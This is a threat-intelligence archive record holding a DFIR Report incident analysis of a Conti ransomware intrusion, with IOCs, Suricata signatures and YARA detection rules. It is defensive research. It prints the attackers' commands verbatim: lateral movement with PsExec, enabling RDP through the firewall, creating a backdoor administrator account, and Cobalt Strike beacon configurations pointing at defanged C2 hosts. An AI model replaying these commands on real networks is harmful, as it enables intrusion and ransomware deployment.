{
	"id": "0988e4be-f54a-4652-a3de-80107274c5c3",
	"created_at": "2026-04-06T00:16:20.825395Z",
	"updated_at": "2026-04-10T03:24:24.04054Z",
	"deleted_at": null,
	"sha1_hash": "ec14be3cc488c68aa11538b12bb29e5c71bab049",
	"title": "Conti Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3004374,
	"plain_text": "Conti Ransomware\r\nBy editor\r\nPublished: 2021-05-12 · Archived: 2026-04-05 19:39:51 UTC\r\nIntroduction\r\nFirst seen in May 2020, Conti ransomware has quickly become one of the most common ransomware variants,\r\naccording to Coveware. As per Coveware’s Quarterly Ransomware Report (Q1 2021), Conti has the 2nd highest\r\nmarket share after Sodinokibi, which we wrote about here. \r\nIn April, we saw a threat actor go from an initial IcedID infection to deploying Conti ransomware domain wide in\r\ntwo days and 11 hours. The threat actors stayed dormant for most of this time, before jumping into action on an\r\nearly Saturday morning. The hands on keyboard activity lasted for two and a half hours. They utilized RDP,\r\nPsExec, and Cobalt Strike to move laterally within the environment before executing Conti in memory across all\r\nactive systems.\r\nSummary\r\nWe assess with moderate confidence that the initial vector used by the threat actor was a zip file, which included a\r\nmalicious JavaScript file, delivered through a phishing campaign. The JavaScript file would eventually download\r\nand execute the IcedID malware. Discovered in 2017, what started as a commodity malware is now currently\r\nbeing deployed as an initial access broker by ransomware threat actors.  \r\nWhile there was some initial discovery activity from the IcedID malware, it went quiet, just beaconing to\r\ncommand and control but not performing any other activity. After being dormant for over two days, a Cobalt\r\nStrike Beacon was dropped and executed on the system infected with IcedID. The threat actors then ran another\r\nround of discovery activity with native windows utilities such as nltest.exe, whoami.exe, and net.exe. They then\r\nsuccessfully escalated to SYSTEM privileges via Cobalt Strike’s built-in “named pipe impersonation”\r\n(GetSystem) functionality.    
\r\nThe threat actors continued by moving laterally to the domain controllers on the network using SMB to transfer and execute a Cobalt Strike Beacon. During that time, we observed port scanning activity from one of the domain controllers, to identify open ports such as SSH, SMB, MSSQL, RDP and WinRM. After a brief gap of 15 minutes, the threat actors used PsExec to copy and execute a Cobalt Strike Beacon DLL on most of the systems in the network.\r\nLater in the attack, the threat actor was seen establishing RDP connections from the beachhead host to the domain controller and other systems throughout the environment. This RDP activity was being proxied through the IcedID process running on that host, to a remote proxy over port 8080.\r\nTo establish persistence, the attackers created a new local user on one of the domain controllers and added it to the Administrators group. Additionally, in an effort to evade any detection and prevention mechanisms, they disabled Windows Defender via a group policy modification.\r\nhttps://thedfirreport.com/2021/05/12/conti-ransomware/\r\nPage 1 of 24\r\nWithin two and a half hours of Cobalt Strike showing up in the environment and just over two days after the initial IcedID infection, the threat actors completed their objective of encrypting all systems. Conti was executed in memory with the help of the Cobalt Strike Beacons domain wide. The ransomware note left by the infection included a link to their Tor site for further details.\r\nAfter further review of the environment (post encryption), we realized multiple systems (including a domain controller) were unable to be accessed and would not have been restorable even if the ransom had been paid.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here.\r\nWe also have artifacts available from this case such as pcaps, memory captures, files, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nAnalysis and reporting completed by @pigerlin, @MetallicHack, @yatinwad, and 1 unnamed contributor.\r\nReviewed by @kostastsale, @RoxpinTeddy, and @TheDFIRReport\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nThe IcedID DLL that we executed was most likely dropped through a zip file, which included a JavaScript file within it. Brad had a few posts about these around the time of this intrusion (1, 2). Thanks Brad!\r\nVarious attributes including the computer name and the OS version of the compromised system were sent through encoded cookie values.\r\nIcedID was executed via rundll32.exe and ran command and control over port 443 for the duration of the intrusion.\r\nrundll32.exe \"C:\\Users\\REDACTED\\AppData\\Local\\Temp\\rate_x32.dat\",update /i:\"LaborBetray\\license.dat\"\r\nDiscovery\r\nIcedID ran initial discovery after being executed on the beachhead. Various commands were executed to gather more information about the compromised environment, including the currently logged on user, domain trusts, groups, etc.\r\nipconfig /all\r\nsysteminfo\r\nwhoami /groups\r\nnet config workstation\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all\r\nnet group \"Domain Admins\" /domain\r\nAdditional discovery commands were executed by Cobalt Strike.\r\ncmd.exe /C whoami /groups\r\ncmd.exe /C query session\r\ncmd.exe /C dir %HOMEDRIVE%%HOMEPATH%\r\ncmd.exe /C nltest /domain_trusts\r\ncmd.exe /C nltest /dclist:\r\ncmd.exe /C net group \"Enterprise admins\" /domain\r\ncmd.exe /C net group \"Domain admins\" /domain\r\nAfter moving laterally to a domain controller, they began looking for what networks were present in the environment using dsquery.\r\ncmd.exe /C dsquery subnet -limit 0\r\nShortly thereafter, port scanning was observed coming from a domain controller looking for common ports (such as SSH, SMB, MSSQL, WinRM and RDP) on systems residing in the same subnet.\r\nPrivilege Escalation\r\nIn order to obtain SYSTEM level privileges, Cobalt Strike’s built-in named pipe impersonation (GetSystem) was used:\r\nImage: \"C:\\Windows\\System32\\cmd.exe\"\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe /c echo 4d64fbbbf34 \u003e \\\\.\\pipe\\b4312c\"\r\nParentImage: \"C:\\Windows\\System32\\runonce.exe\"\r\nParentCommandLine: \"C:\\Windows\\system32\\runonce.exe\"\r\nLateral Movement\r\nThe threat actor began lateral movement using remote execution of Cobalt Strike Beacon service binaries.\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\d8d6deb\\ImagePath\r\nDetails: \\\\HOSTNAME\\ADMIN$\\d8d6deb.exe\r\nAfter this initial activity, Cobalt Strike was used to enable RDP, and allow it through the firewall, on the domain controllers.\r\ncmd.exe /C reg add \"hklm\\system\\currentControlSet\\Control\\Terminal Server\" /v \"fDenyTSConnections\" /t\r\ncmd.exe /C netsh firewall set service type = remotedesktop mode = enable\r\ncmd.exe /C netsh firewall set rule group=\"remote desktop\" new enable=Yes\r\ncmd.exe /C netsh advfirewall set rule group=\"remote desktop\" new enable=Yes\r\nFollowing this, the threat actors copied a Cobalt Strike Beacon DLL to the ADMIN$ share and then distributed it throughout the environment using PsExec.\r\ncmd.exe /C copy 192145.dll \\\\\u003cINTERNAL_IP\u003e\\ADMIN$ /Y /Z\r\npsexec.exe -accepteula -d -s \\\\\u003cINTERNAL_IP\u003e rundll32.exe C:\\windows\\192145.dll,StartW\r\nFrom here, RDP connections were established from the beachhead host to systems throughout the environment. The connections were proxied through the IcedID process.\r\nThe threat actor used a redirector (38.135.122[.]194:8080) to proxy the RDP traffic being passed through the IcedID process. The below traffic shows more details of the RDP session, including the username in the cookie.\r\nThis proxied traffic reported back the hostname of the threat actor’s machine as “mikespc”. We’re looking for you Mike! ;)\r\nDefense Evasion\r\nTo evade detection, the threat actors disabled Windows Defender by adding the below to an already linked GPO. They then force updated the GPO on all clients using Cobalt Strike.\r\nParentCommandLine | CommandLine\r\nC:\\Windows\\System32\\dllhost.exe | C:\\Windows\\system32\\cmd.exe /C gpupdate /force\r\nC:\\Users\\USER\\AppData\\Local\\Temp\\icju1.exe | C:\\Windows\\system32\\cmd.exe /C gpupdate /force\r\nC:\\Windows\\System32\\dllhost.exe | C:\\Windows\\system32\\cmd.exe /C gpupdate /force\r\n\"rundll32.exe\" c:\\windows\\192145.dll,StartW | C:\\Windows\\system32\\cmd.exe /C gpupdate /force\r\nRegistry Keys | Action\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware | DeleteValue\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Monitoring\\DisableRealtimeMonitoring | DeleteValue\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Monitoring\\DisableBehaviorMonitoring | DeleteValue\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Monitoring\\DisableIntrusionPreventionSystem | DeleteValue\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection | DeleteKey\r\nIn addition, other security services were stopped or uninstalled.\r\nNET STOP \"redacted\"\r\nEventID: 13\r\nDescription: RegistryEvent (Value Set)\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\\u003credacted\u003e\\Start\r\nValue: DWORD (0x00000004)\r\nCommand and Control\r\nIcedID\r\n68.183.20[.]194:80\r\nvaclicinni[.]xyz\r\n83.97.20[.]160:443\r\noxythuler[.]cyou\r\nexpertulthima[.]club\r\ndictorecovery[.]cyou\r\nthulleultinn[.]club\r\nKey Identifier: 82:92:07:FD:86:23:FE:26:0E:4A:42:5A:F7:C7:70:2A:45:4E:01:5B\r\nNot Before: Apr 22 15:27:02 2021 GMT\r\nNot After: Apr 22 15:27:02 2022 GMT\r\nCommonName: localhost\r\nCity = AU\r\nState = Some-State\r\nOrg = Internet Widgits Pty Ltd\r\nja3: a0e9f5d64349fb13191bc781f81f42e1\r\nja3s: ec74a5c51106f0419184d0dd08fb05bc\r\n159.89.140[.]116:443\r\noxythuler[.]cyou\r\nthulleultinn[.]club\r\nKey Identifier: A4:EB:95:C2:04:91:E3:AF:67:7C:5D:B3:CB:DB:E3:38:90:5E:A7:68\r\nNot Before: Apr 13 14:59:41 2021 GMT\r\nNot After: Apr 13 14:59:41 2022 GMT\r\nCommonName: localhost\r\nCity = AU\r\nState = Some-State\r\nOrg = Internet Widgits Pty Ltd\r\nja3: a0e9f5d64349fb13191bc781f81f42e1\r\nja3s: ec74a5c51106f0419184d0dd08fb05bc\r\nCobalt Strike\r\n192.99.178[.]145:80\r\ndimentos[.]com\r\nConfig:\r\nPort 443:\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce[.]exe\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce[.]exe\",\r\n\"Jitter\": 39,\r\n\"Method 2\": \"POST\",\r\n\"Port\": 443,\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Polling\": 62719,\r\n\"HTTP Method Path 2\": \"/btn_bg\",\r\n\"Method 1\": \"GET\",\r\n\"C2 Server\": \"dimentos[.]com,/FAQ\"\r\n\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce[.]exe\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce[.]exe\",\r\n\"Jitter\": 39,\r\n\"Method 2\": \"POST\",\r\n\"Port\": 443,\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Polling\": 62719,\r\n\"HTTP Method Path 2\": \"/btn_bg\",\r\n\"Method 1\": \"GET\",\r\n\"C2 Server\": \"dimentos[.]com,/bg\"\r\nPort 80:\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce[.]exe\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce[.]exe\",\r\n\"Jitter\": 39,\r\n\"Method 2\": \"POST\",\r\n\"Port\": 80,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Polling\": 62719,\r\n\"HTTP Method Path 2\": \"/btn_bg\",\r\n\"Method 1\": \"GET\",\r\n\"C2 Server\": \"192[.]99[.]178[.]145,/r-arrow\"\r\n\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce[.]exe\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce[.]exe\",\r\n\"Jitter\": 39,\r\n\"Method 2\": \"POST\",\r\n\"Port\": 80,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Polling\": 62719,\r\n\"HTTP Method Path 2\": \"/btn_bg\",\r\n\"Method 1\": \"GET\",\r\n\"C2 Server\": \"192[.]99[.]178[.]145,/bg\"\r\nMachine beaconing out to Cobalt Strike using the above profile\r\nPersistence\r\nAn account named “nuuser” was created by one of the Cobalt Strike Beacons. As these commands were run on a domain controller, it essentially added the account to the Built-in Administrators domain group, granting it administrative privileges in the AD domain.\r\nnet user /add /Y nuuser 7HeC00l3stP@ssw0rd\r\nnet localgroup administrators nuuser /add\r\nCredential Access\r\nLSASS was accessed by an unusual process \"runonce.exe\" on multiple hosts, including a domain controller.\r\nEventID: 10\r\nDescription: Process Access\r\nSourceImage: \"C:\\Windows\\System32\\runonce.exe\"\r\nTargetImage: \"C:\\Windows\\system32\\lsass.exe\"\r\nSourceImage: \"C:\\Windows\\system32\\runonce.exe\"\r\nTargetImage: \"C:\\Windows\\system32\\lsass.exe\"\r\nGrantedAccess: 0x1010\r\nCallTrace: \"C:\\Windows\\SYSTEM32\\ntdll.dll+9c584|C:\\Windows\\System32\\KERNELBASE.dll+2730e|UNKNOWN(0000\r\nThe overpass-the-hash technique was used to acquire a valid Kerberos ticket for the administrator user.\r\nImpact\r\nAbout two and a half hours after initial hands-on-keyboard activity, the Cobalt Strike Beacon processes running across the target systems injected the Conti DLL into memory. Conti deployments using a DLL seem to have first started showing up in December 2020.\r\nSome traces of this particular DLL were found in the memory dump taken from one of the compromised systems.\r\nWe were unable to reconstruct the DLL from memory but Maxime Thiebaut (@0xThiebaut) from NVISO helped us out. The Yara rule, located in the detections section below, was made possible due to him reconstructing the DLL. Thanks Maxime!\r\nConti scans the network for 445/SMB, looking for machines to encrypt.\r\nRansom note\r\nWhich leads you here.\r\nThe threat actors asked for 150k and could have been talked down at least ~20%.\r\nMultiple machines within the environment were not usable after being ransomed, including a domain controller. The machines were left like this and you were not able to do anything but press control+alt+delete. Paying the ransom will not help you here.\r\nPivots\r\nWhile researching the infrastructure related to this campaign, we found the threat actor revealed further infrastructure. The domain associated with the Cobalt Strike C2 (dimentos[.]com) has an unredacted Whois record that reveals several other domains also registered by the address pokix19891[@]kindbest[.]com. You’ll notice the fake address and fake phone number as well.\r\nAll the domains were registered on 2021-03-30, and according to public data available in VirusTotal, three of them have been associated with Cobalt Strike infrastructure so far: the domain seen in this intrusion, powelin[.]com and awesents[.]com.\r\nThe two other domains (jocinet[.]com, ilimennt[.]com) have subdomains that look like name servers (ns1 and ns2), which were pointed to two of the Cobalt Strike hosting IPs. All of this infrastructure was hosted on the VPS provider OVH.\r\nIOCs\r\nFiles\r\nb52c0640957e5032b5160578f8cb99f9b066fde4f9431ee6869b2eea67338f28.dll.exe\r\nb52c0640957e5032b5160578f8cb99f9b066fde4f9431ee6869b2eea67338f28\r\nicju1.exe\r\ne54f38d06a4f11e1b92bb7454e70c949d3e1a4db83894db1ab76e9d64146ee06\r\nrate_x32.dat\r\neb79168391e64160883b1b3839ed4045b4fd40da14d6eec5a93cfa9365503586\r\n192145.dll\r\nf29bc338e63a62c24c301c04961084013816733dad446a29c20d4413c5c818af9\r\nNetwork\r\nIcedID\r\nvaclicinni[.]xyz\r\nthulleultinn[.]club\r\noxythuler[.]cyou\r\ndictorecovery[.]cyou\r\nexpertulthima[.]club\r\n68.183.20[.]194:80\r\n159.89.140[.]116:443\r\n83.97.20[.]160:443\r\nCobalt Strike\r\ndimentos[.]com\r\n192.99.178[.]145:80\r\nProxy\r\n38.135.122[.]194:8080\r\nDetections\r\nSuricata\r\nET MALWARE Win32/IcedID Requesting Encoded Binary M4\r\nET MALWARE W32/Photoloader.Downloader Request Cookie\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nET INFO Executable Retrieved With Minimal HTTP Headers – Potential Second Stage Download\r\nET INFO Packed Executable Download\r\nET POLICY OpenSSL Demo CA – Internet Widgits Pty\r\nATTACK [PTsecurity] Overpass the hash. Encryption downgrade activity to ARCFOUR-HMAC-MD5\r\nET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET SCAN Behavioral Unusual Port 1434 traffic Potential Scan or Infection\r\nET SCAN Behavioral Unusual Port 1435 traffic Potential Scan or Infection\r\nSigma\r\nSigma Rule Converter for SIEMs and EDRs: https://uncoder.io/\r\nYARA\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2021-05-09\r\nIdentifier: 3584\r\nReference: https://thedfirreport.com\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\n\r\nrule icedid_rate_x32 {\r\n    meta:\r\n        description = \"files - file rate_x32.dat\"\r\n        author = \"The DFIR Report\"\r\n        reference = \"https://thedfirreport.com\"\r\n        date = \"2021-05-09\"\r\n        hash1 = \"eb79168391e64160883b1b3839ed4045b4fd40da14d6eec5a93cfa9365503586\"\r\n    strings:\r\n        $s1 = \"UAWAVAUATVWSH\" fullword ascii\r\n        $s2 = \"UAWAVVWSPH\" fullword ascii\r\n        $s3 = \"AWAVAUATVWUSH\" fullword ascii\r\n        $s4 = \"update\" fullword ascii /* Goodware String - occurred 207 times */\r\n        $s5 = \"?klopW@@YAHXZ\" fullword ascii\r\n        $s6 = \"?jutre@@YAHXZ\" fullword ascii\r\n        $s7 = \"PluginInit\" fullword ascii\r\n        $s8 = \"[]_^A\\\\A]A^A_\" fullword ascii\r\n        $s9 = \"e8[_^A\\\\A]A^A_]\" fullword ascii\r\n        $s10 = \"[_^A\\\\A]A^A_]\" fullword ascii\r\n        $s11 = \"Kts=R,4iu\" fullword ascii\r\n        $s12 = \"mqr55c\" fullword ascii\r\n        $s13 = \"R,4i=Bj\" fullword ascii\r\n        $s14 = \"Ktw=R,4iu\" fullword ascii\r\n        $s15 = \"Ktu=R,4iu\" fullword ascii\r\n        $s16 = \"Kt{=R,4iu\" fullword ascii\r\n        $s17 = \"KVL.Mp\" fullword ascii\r\n        $s18 = \"Kt|=R,4iu\" fullword ascii\r\n        $s19 = \"=8c[Vt8=\" fullword ascii\r\n        $s20 = \"Ktx=R,4iu\" fullword ascii\r\n    condition:\r\n        uint16(0) == 0x5a4d and filesize \u003c 700KB and\r\n        ( pe.imphash() == \"15787e97e92f1f138de37f6f972eb43c\" and ( pe.exports(\"?jutre@@YAHXZ\") and pe.exports\r\n}\r\n\r\nrule conti_cobaltstrike_192145 {\r\n    meta:\r\n        description = \"files - file 192145.dll\"\r\n        author = \"The DFIR Report\"\r\n        reference = \"https://thedfirreport.com\"\r\n        date = \"2021-05-09\"\r\n        hash1 = \"29bc338e63a62c24c301c04961084013816733dad446a29c20d4413c5c818af9\"\r\n    strings:\r\n        $x1 = \"cmd.exe /c echo NGAtoDgLpvgJwPLEPFdj\u003e\\\"%s\\\"\u0026exit\" fullword ascii\r\n        $s2 = \"veniamatquiest90.dll\" fullword ascii\r\n        $s3 = \"Quaerat magni assumenda nihil architecto labore ullam autem unde temporibus mollitia illum\" fullword ascii\r\n        $s4 = \"Quaerat tempora culpa provident\" fullword ascii\r\n        $s5 = \"Velit consequuntur quisquam tempora error\" fullword ascii\r\n        $s6 = \"Quo omnis repellat ut expedita temporibus eius fuga error\" fullword ascii\r\n        $s7 = \"Dolores ullam tempora error distinctio ut natus facere quibusdam\" fullword ascii\r\n        $s8 = \"Corporis minima omnis qui est temporibus sint quo error magnam\" fullword ascii\r\n        $s9 = \"Officia sit maiores deserunt nobis tempora deleniti aut et quidem fugit\" fullword ascii\r\n        $s10 = \"Rerum tenetur sapiente est tempora qui deserunt\" fullword ascii\r\n        $s11 = \"Sed nulla quaerat porro error excepturi\" fullword ascii\r\n        $s12 = \"Aut tempore quo cumque dicta ut quia in\" fullword ascii\r\n        $s13 = \"Doloribus commodi repudiandae voluptates consequuntur neque tempora ut neque nemo ad ut\" fullword ascii\r\n        $s14 = \"Tempore possimus aperiam nam mollitia illum hic at ut doloremque\" fullword ascii\r\n        $s15 = \"Dolorum eum ipsum tempora non et\" fullword ascii\r\n        $s16 = \"Quas alias illum laborum tempora sit est rerum temporibus dicta et\" fullword ascii\r\n        $s17 = \"Et quia aut temporibus enim repellat dolores totam recusandae repudiandae\" fullword ascii\r\n        $s18 = \"Sed velit ipsa et dolor tempore sunt nostrum\" fullword ascii\r\n        $s19 = \"Veniam voluptatem aliquam et eaque tempore tenetur possimus\" fullword ascii\r\n        $s20 = \"Possimus suscipit placeat dolor quia tempora voluptas qui fugiat et accusantium\" fullword ascii\r\n    condition:\r\n        uint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n        ( pe.imphash() == \"5cf3cdfe8585c01d2673249153057181\" and pe.exports(\"StartW\") or ( 1 of ($x*) or 4 of them ) )\r\n}\r\n\r\nrule conti_cobaltstrike_icju1 {\r\n    meta:\r\n        description = \"files - file icju1.exe\"\r\n        author = \"The DFIR Report\"\r\n        reference = \"https://thedfirreport.com\"\r\n        date = \"2021-05-09\"\r\n        hash1 = \"e54f38d06a4f11e1b92bb7454e70c949d3e1a4db83894db1ab76e9d64146ee06\"\r\n    strings:\r\n        $x1 = \"cmd.exe /c echo NGAtoDgLpvgJwPLEPFdj\u003e\\\"%s\\\"\u0026exit\" fullword ascii\r\n        $s2 = \"veniamatquiest90.dll\" fullword ascii\r\n        $s3 = \"Quaerat magni assumenda nihil architecto labore ullam autem unde temporibus mollitia illum\" fullword ascii\r\n        $s4 = \"Quaerat tempora culpa provident\" fullword ascii\r\n        $s5 = \"Velit consequuntur quisquam tempora error\" fullword ascii\r\n        $s6 = \"Quo omnis repellat ut expedita temporibus eius fuga error\" fullword ascii\r\n        $s7 = \"Dolores ullam tempora error distinctio ut natus facere quibusdam\" fullword ascii\r\n        $s8 = \"Corporis minima omnis qui est temporibus sint quo error magnam\" fullword ascii\r\n        $s9 = \"Officia sit maiores deserunt nobis tempora deleniti aut et quidem fugit\" fullword ascii\r\n        $s10 = \"Rerum tenetur sapiente est tempora qui deserunt\" fullword ascii\r\n        $s11 = \"Sed nulla quaerat porro error excepturi\" fullword ascii\r\n        $s12 = \"Aut tempore quo cumque dicta ut quia in\" fullword ascii\r\n        $s13 = \"Doloribus commodi repudiandae voluptates consequuntur neque tempora ut neque nemo ad ut\" fullword ascii\r\n        $s14 = \"Tempore possimus aperiam nam mollitia illum hic at ut doloremque\" fullword ascii\r\n        $s15 = \"Dolorum eum ipsum tempora non et\" fullword ascii\r\n        $s16 = \"Quas alias illum laborum tempora sit est rerum temporibus dicta et\" fullword ascii\r\n        $s17 = \"Et quia aut temporibus enim repellat dolores totam recusandae repudiandae\" fullword ascii\r\n        $s18 = \"Sed velit ipsa et dolor tempore sunt nostrum\" fullword ascii\r\n        $s19 = \"Veniam voluptatem aliquam et eaque tempore tenetur possimus\" fullword ascii\r\n        $s20 = \"Possimus suscipit placeat dolor quia tempora voluptas qui fugiat et accusantium\" fullword ascii\r\n    condition:\r\n        uint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n        ( pe.imphash() == \"a6d9b7f182ef1cfe180f692d89ecc759\" or ( 1 of ($x*) or 4 of them ) )\r\n}\r\n\r\nrule conti_v3 {\r\n    meta:\r\n        description = \"conti_yara - file conti_v3.dll\"\r\n        author = \"pigerlin\"\r\n        reference = \"https://thedfirreport.com\"\r\n        date = \"2021-05-09\"\r\n        hash1 = \"8391dc3e087a5cecba74a638d50b771915831340ae3e027f0bb8217ad7ba4682\"\r\n    strings:\r\n        $s1 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n        $s2 = \"conti_v3.dll\" fullword ascii\r\n        $s3 = \" \" fullword ascii\r\n        $s4 = \" Type Descriptor'\" fullword ascii\r\n        $s5 = \"operator co_await\" fullword ascii\r\n        $s6 = \" \" fullword ascii\r\n        $s7 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n        $s8 = \" Base Class Descriptor at (\" fullword ascii\r\n        $s9 = \" Class Hierarchy Descriptor'\" fullword ascii\r\n        $s10 = \" Complete Object Locator'\" fullword ascii\r\n        $s11 = \" delete[]\" fullword ascii\r\n        $s12 = \" \" fullword ascii\r\n        $s13 = \"__swift_1\" fullword ascii\r\n        $s15 = \"__swift_2\" fullword ascii\r\n        $s19 = \" delete\" fullword ascii\r\n    condition:\r\n        uint16(0) == 0x5a4d and filesize \u003c 700KB and\r\n        all of them\r\n}\r\n\r\nrule conti_cobaltstrike_192145_icju1_0 {\r\n    meta:\r\n        description = \"files - from files 192145.dll, icju1.exe\"\r\n        author = \"The DFIR Report\"\r\n        reference = \"https://thedfirreport.com\"\r\n        date = \"2021-05-09\"\r\n        hash1 = \"29bc338e63a62c24c301c04961084013816733dad446a29c20d4413c5c818af9\"\r\n        hash2 = \"e54f38d06a4f11e1b92bb7454e70c949d3e1a4db83894db1ab76e9d64146ee06\"\r\n    strings:\r\n        $x1 = \"cmd.exe /c echo NGAtoDgLpvgJwPLEPFdj\u003e\\\"%s\\\"\u0026exit\" fullword ascii\r\n        $s2 = \"veniamatquiest90.dll\" fullword ascii\r\n        $s3 = \"Quaerat magni assumenda nihil architecto labore ullam autem unde temporibus mollitia illum\" fullword ascii\r\n        $s4 = \"Quaerat tempora culpa provident\" fullword ascii\r\n        $s5 = \"Dolores ullam tempora error distinctio ut natus facere quibusdam\" fullword ascii\r\n        $s6 = \"Velit consequuntur quisquam tempora error\" fullword ascii\r\n        $s7 = \"Corporis minima omnis qui est temporibus sint quo error magnam\" fullword ascii\r\n        $s8 = \"Quo omnis repellat ut expedita temporibus eius fuga error\" fullword ascii\r\n        $s9 = \"Officia sit maiores deserunt nobis tempora deleniti aut et quidem fugit\" fullword ascii\r\n        $s10 = \"Rerum tenetur sapiente est tempora qui deserunt\" fullword ascii\r\n        $s11 = \"Sed nulla quaerat porro error excepturi\" fullword ascii\r\n        $s12 = \"Aut tempore quo cumque dicta ut quia in\" fullword ascii\r\n        $s13 = \"Doloribus commodi repudiandae voluptates consequuntur neque tempora ut neque nemo ad ut\" fullword ascii\r\n        $s14 = \"Tempore possimus aperiam nam mollitia illum hic at ut doloremque\" fullword ascii\r\n        $s15 = \"Et quia aut temporibus enim repellat dolores totam recusandae repudiandae\" fullword ascii\r\n        $s16 = \"Dolorum eum ipsum tempora non et\" fullword ascii\r\n        $s17 = \"Quas alias illum laborum tempora sit est rerum temporibus dicta et\" fullword ascii\r\n        $s18 = \"Sed velit ipsa et dolor tempore sunt nostrum\" fullword ascii\r\n        $s19 = \"Veniam voluptatem aliquam et eaque tempore tenetur possimus\" fullword ascii\r\n        $s20 = \"Possimus suscipit placeat dolor quia tempora voluptas qui fugiat et accusantium\" fullword ascii\r\n    condition:\r\n        ( uint16(0) == 0x5a4d and filesize \u003c 2000KB and ( 1 of ($x*) and 4 of them )\r\n        ) or ( all of them )\r\n}\r\nMITRE:\r\nCommand and Scripting Interpreter – T1059\r\nExternal Proxy – T1090.002\r\nRemote Desktop Protocol – T1021.001\r\nOS Credential Dumping – T1003\r\nPass the Hash – T1550.002\r\nService Execution – T1569.002\r\nSMB/Windows Admin Shares – T1021.002\r\nData Encrypted for Impact – T1486\r\nSystem Owner/User Discovery – T1033\r\nPermission Groups Discovery – T1069\r\nApplication Layer Protocol – T1071\r\nProcess Injection – T1055\r\nGroup Policy Modification – T1484\r\nAccess Token Manipulation – T1134\r\nCreate Account – T1136\r\nRemote System Discovery – T1018\r\nNetwork Service Scanning – T1046\r\nDomain Account – T1087.002\r\nImpair Defenses – T1562\r\nInternal case: 3584\r\nSource: https://thedfirreport.com/2021/05/12/conti-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2021/05/12/conti-ransomware/"
	],
	"report_names": [
		"conti-ransomware"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434580,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ec14be3cc488c68aa11538b12bb29e5c71bab049.pdf",
		"text": "https://archive.orkl.eu/ec14be3cc488c68aa11538b12bb29e5c71bab049.txt",
		"img": "https://archive.orkl.eu/ec14be3cc488c68aa11538b12bb29e5c71bab049.jpg"
	}
}